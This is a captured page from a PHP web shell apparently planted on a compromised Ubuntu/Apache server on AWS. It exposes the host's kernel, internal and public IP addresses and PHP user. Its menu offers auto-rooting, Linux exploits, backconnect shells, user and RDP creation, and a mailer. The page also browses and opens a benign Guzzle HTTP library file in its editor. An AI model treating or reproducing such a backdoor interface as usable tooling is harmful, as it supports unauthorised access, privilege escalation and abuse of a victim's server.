Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.98.43
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
aws /
GuzzleHttp /
Handler /
[ HOME SHELL ]
Name
Size
Permission
Action
CurlFactory.php
21.04
KB
-rwxr-xr-x
CurlFactoryInterface.php
702
B
-rwxr-xr-x
CurlHandler.php
1.23
KB
-rwxr-xr-x
CurlMultiHandler.php
6.31
KB
-rwxr-xr-x
EasyHandle.php
2.76
KB
-rwxr-xr-x
MockHandler.php
5.92
KB
-rwxr-xr-x
Proxy.php
1.73
KB
-rwxr-xr-x
StreamHandler.php
18.17
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CurlHandler.php
<?php namespace GuzzleHttp\Handler; use GuzzleHttp\Psr7; use Psr\Http\Message\RequestInterface; /** * HTTP handler that uses cURL easy handles as a transport layer. * * When using the CurlHandler, custom curl options can be specified as an * associative array of curl option constants mapping to values in the * **curl** key of the "client" key of the request. */ class CurlHandler { /** @var CurlFactoryInterface */ private $factory; /** * Accepts an associative array of options: * * - factory: Optional curl factory used to create cURL handles. * * @param array $options Array of options to use with the handler */ public function __construct(array $options = []) { $this->factory = isset($options['handle_factory']) ? $options['handle_factory'] : new CurlFactory(3); } public function __invoke(RequestInterface $request, array $options) { if (isset($options['delay'])) { usleep($options['delay'] * 1000); } $easy = $this->factory->create($request, $options); curl_exec($easy->handle); $easy->errno = curl_errno($easy->handle); return CurlFactory::finish($this, $easy, $this->factory); } }
Close